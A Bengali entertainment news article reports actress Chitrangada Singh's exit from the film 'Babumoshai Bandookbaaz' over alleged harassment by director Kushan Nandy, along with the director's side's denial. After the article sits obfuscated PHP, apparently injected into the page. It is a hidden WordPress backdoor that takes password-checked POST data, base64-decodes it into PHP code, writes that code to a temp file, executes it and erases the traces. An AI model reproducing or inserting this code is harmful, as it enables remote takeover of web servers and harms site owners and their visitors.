বুধবার, ১৯শে জুন, ২০২৪ খ্রিস্টাব্দ ৫ই আষাঢ়, ১৪৩১ বঙ্গাব্দ

যৌনদৃশ্যে জোর করেন পরিচালক

chitrangadaবিনোদন ডেস্ক : পরিচালক কুশান নন্দী যৌনদৃশ্যে অভিনয়ে জোর করায় ‘বাবুমশায় বন্দুকবাজ’ সিনেমা থেকে নিজেকে প্রত্যাহার করেছে নিয়েছেন বলিউড অভিনেত্রী চিত্রাঙ্গদা সিংহ।

সম্প্রতি নওয়াজউদ্দিন সিদ্দিকির সঙ্গে ‘বাবুমশায় বন্দুকবাজ’ ছবিতে অভিনয় করছিলেন চিত্রাঙ্গদা।

সেখানে একটি দৃশ্য ছিল এমন- বেডে খোলামেলা হয়ে থাকবেন চিত্রাঙ্গদা। আর তাকে ঘিরে রগরগে উত্তেজনা ছড়াবেন নওয়াজউদ্দিন।

চিত্রাঙ্গদার অভিযোগ, ছবির পরিচালক কুশান নন্দী অত্যন্ত খারাপ ইঙ্গিত করে এই ছবির দৃশ্য বোঝাতে থাকেন। এরপর ফার্স্ট টেক দেয়ার পর নায়িকার ওপর চিৎকার করেন তিনি।

চিত্রাঙ্গদা জানিয়েছেন, গোটা টিমের সামনে যৌনদৃশ্য বোঝাতে গিয়ে পরিচালক যে সব শব্দ ব্যবহার করেছেন, তা অত্যন্ত আপত্তিকর।

তিনি অপমানিত বোধ করেন। এরপরই কাঁদতে কাঁদতে সেট ছেড়ে বেরিয়েও যান নায়িকা।

সূত্র জানায়, পরিচালক চিত্রাঙ্গদাকে উদ্দেশ্য করতে সেটে সবার সামনে বলতে থাকেন, ‘চিত্রাঙ্গদা, তোমার নওয়াজের কাছ থেকে শেখা উচিত। যাও টানগি রাগো এবং সেক্স কর।’

এ ঘটনায় নিজেকে সিনেমা থেকে প্রত্যাহার করে নেন চিত্রাঙ্গদা। তার জায়গায় নিল ব্যাটি সানাতার সারা ভাস্কর অভিনয় করবেন বলে জানা গেছে।

যদিও পরিচালকে এক ঘনিষ্ঠ সূত্রের দাবি, চিত্রাঙ্গদার অভিনয় প্রযোজকের পছন্দ হচ্ছিল না। সে কারণেই তাকে ছবিটি ছেড়ে দিতে বলা হয়। আর এর পরই পরিচালকের নামে ভুল অভিযোগ করেন তিনি।

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}